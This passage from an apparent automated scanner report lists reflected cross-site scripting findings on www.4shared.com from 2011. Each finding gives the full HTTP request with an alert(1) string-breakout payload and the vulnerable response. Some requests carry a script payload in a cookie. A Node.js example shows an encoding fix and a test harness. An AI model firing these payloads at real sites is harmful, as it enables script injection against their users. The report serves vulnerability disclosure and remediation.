This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsab098"-alert(1)-"8cd6f08d9/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsab098&quot;-alert(1)-&quot;8cd6f08d9/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=57CB8FCED9A0A676750D873D115BEA0A.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsab098"-alert(1)-"8cd6f08d9/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.32. http://www.4shared.com/js/index.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa86"-alert(1)-"df4c1953dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/index.jsefa86"-alert(1)-"df4c1953dcc?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/index.jsefa86&quot;-alert(1)-&quot;df4c1953dcc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BDFBB8D835A68248C340B07013F288A2.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:33 GMT
Content-Length: 36818


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/index.jsefa86"-alert(1)-"df4c1953dcc";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.33. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55f12"-alert(1)-"f7aecd99122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js55f12"-alert(1)-"f7aecd99122/loginScript.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js55f12&quot;-alert(1)-&quot;f7aecd99122/loginScript.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3E73AECAF5C0BAC4CA79DF79445828D0.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:31 GMT
Content-Length: 36855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js55f12"-alert(1)-"f7aecd99122/loginScript.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

5.34. http://www.4shared.com/js/loginScript.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de174"-alert(1)-"725a9c623ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/loginScript.jspde174"-alert(1)-"725a9c623ce?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/loginScript.jspde174&quot;-alert(1)-&quot;725a9c623ce
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=73266099C7D574540CC4E6F42B2C66F0.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:39 GMT
Content-Length: 36168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/loginScript.jspde174"-alert(1)-"725a9c623ce";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.35. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe0b9"-alert(1)-"c10b6d0808b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfe0b9"-alert(1)-"c10b6d0808b/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsfe0b9&quot;-alert(1)-&quot;c10b6d0808b/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E24C1E87E4B669F1C8521481DBCB7839.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:29 GMT
Content-Length: 36876


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jsfe0b9"-alert(1)-"c10b6d0808b/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

5.36. http://www.4shared.com/js/signup-script.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd94"-alert(1)-"07633452741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/signup-script.jsp8cd94"-alert(1)-"07633452741?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp8cd94&quot;-alert(1)-&quot;07633452741
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A2D2D02377B86E002D082324E7FF1D94.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:37 GMT
Content-Length: 36172


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/signup-script.jsp8cd94"-alert(1)-"07633452741";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.37. http://www.4shared.com/loginBox.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /loginBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15fe3"-alert(1)-"13719462e8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /loginBox.jsp15fe3"-alert(1)-"13719462e8f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /loginBox.jsp15fe3&quot;-alert(1)-&quot;13719462e8f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=92FE70F5A3203E5B91958B63EB8FC1BD.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/loginBox.jsp15fe3"-alert(1)-"13719462e8f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.38. http://www.4shared.com/m/android.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/android.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9395b"-alert(1)-"96bc668bd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m9395b"-alert(1)-"96bc668bd2/android.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m9395b&quot;-alert(1)-&quot;96bc668bd2/android.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6BC1AAE839A91BD67907F851E8D3402D.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:38 GMT
Connection: close
Content-Length: 36123


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m9395b"-alert(1)-"96bc668bd2/android.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...
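
The pattern behind this finding and one way to close it, as an added example rather than code from the report or from 4shared.com: the vulnerable template concatenates the request path into a double-quoted JavaScript literal exactly as the reportAbuse() snippet above does; the hardened template runs the path through a JavaScript-string encoder first. A small sandbox evaluates the generated statement with a counting alert() stub, so the break-out is observed rather than assumed. The function names, the LINK_PREFIX constant and the sandbox are assumptions for illustration; the payload is the one from finding 5.38. Node.js, no dependencies.

```javascript
// Added example (not code from the 4shared.com page or the scanner report).
// Vulnerable server-side pattern beside a hardened one, plus a sandbox that
// shows whether the echoed path escapes the JavaScript string literal.

const LINK_PREFIX = '/abuse.jsp?aLink=http://www.4shared.com';

// Vulnerable: the request path is concatenated straight into a double-quoted
// JS string literal, as the reportAbuse() snippet in the 404 responses does.
function renderUrlAssignmentVulnerable(requestPath) {
  return 'var url="' + LINK_PREFIX + requestPath + '";';
}

// Encoder for the JavaScript string-literal context: every character outside
// [A-Za-z0-9] becomes \xHH (or \uHHHH above U+00FF).  This neutralises quote
// break-outs ("), backslash tricks, </script> (no raw < or / survives) and the
// U+2028/U+2029 line terminators that a plain JSON encoder would leave in.
function encodeForJavaScriptString(value) {
  let out = '';
  for (const ch of String(value)) {
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) {
      out += ch;
    } else if (cp < 0x100) {
      out += '\\x' + cp.toString(16).toUpperCase().padStart(2, '0');
    } else if (cp < 0x10000) {
      out += '\\u' + cp.toString(16).toUpperCase().padStart(4, '0');
    } else {
      out += '\\u{' + cp.toString(16).toUpperCase() + '}';
    }
  }
  return out;
}

// Hardened: same template, but the untrusted segment is encoded for the
// context it lands in.
function renderUrlAssignmentSafe(requestPath) {
  return 'var url="' + LINK_PREFIX + encodeForJavaScriptString(requestPath) + '";';
}

// Stand-in for the browser executing the inline script: evaluate the generated
// statement in a function scope with an alert() stub that counts calls, and
// return what `url` ended up holding.
function runInSandbox(statement) {
  let alerts = 0;
  const alertStub = () => { alerts += 1; };
  const fn = new Function('alert', statement + '\nreturn url;');
  const url = fn(alertStub);
  return { alerts, url };
}

// The scanner's payload from finding 5.38, placed in REST URL parameter 1.
const SCANNER_PATH = '/m9395b"-alert(1)-"96bc668bd2/android.jsp';

// Vulnerable: alert() fires once and `url` degrades to NaN (string minus
// number minus string).  Safe: alert() never runs and `url` holds the path
// verbatim, payload included, as inert data.
function demo() {
  const vulnerable = runInSandbox(renderUrlAssignmentVulnerable(SCANNER_PATH));
  const safe = runInSandbox(renderUrlAssignmentSafe(SCANNER_PATH));
  return { vulnerable, safe };
}

console.log(demo());
```

The encoder follows the "escape everything that is not alphanumeric" rule for script contexts rather than a JSON encoder, because JSON.stringify leaves `<`, `/` and U+2028 untouched, and `</script>` in the data would still terminate the element. Note that the fix encodes for the JavaScript string only; the value is then passed to window.open() as a URL, so if it were ever placed into an HTML attribute as well it would need a second, attribute-context encoding at that point.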

5.39. http://www.4shared.com/m/android.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/android.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed12"-alert(1)-"ff9a528e7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m/android.jsp4ed12"-alert(1)-"ff9a528e7d7 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/android.jsp4ed12&quot;-alert(1)-&quot;ff9a528e7d7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7086C84FC8FF96049E03701F16AE0CAE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/android.jsp4ed12"-alert(1)-"ff9a528e7d7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.40. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/blackberry.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c39b"-alert(1)-"ba8c575a95c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m2c39b&quot;-alert(1)-&quot;ba8c575a95c/blackberry.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A4F0296C826302157650E9633BE16FD7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:40 GMT
Connection: close
Content-Length: 36132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

5.41. http://www.4shared.com/m/blackberry.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/blackberry.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69a6b"-alert(1)-"80db2a41027 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m/blackberry.jsp69a6b"-alert(1)-"80db2a41027 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/blackberry.jsp69a6b&quot;-alert(1)-&quot;80db2a41027
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=95403D84C0034F17BA2CB6B67773D206.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:45 GMT
Connection: close
Content-Length: 36132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/blackberry.jsp69a6b"-alert(1)-"80db2a41027";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.42. http://www.4shared.com/m/symbian.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/symbian.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6ba5"-alert(1)-"f2530800432 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mf6ba5"-alert(1)-"f2530800432/symbian.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /mf6ba5&quot;-alert(1)-&quot;f2530800432/symbian.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=99D8FFB4975C056D9F3C05BF4AC05215.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:39 GMT
Connection: close
Content-Length: 36117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/mf6ba5"-alert(1)-"f2530800432/symbian.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
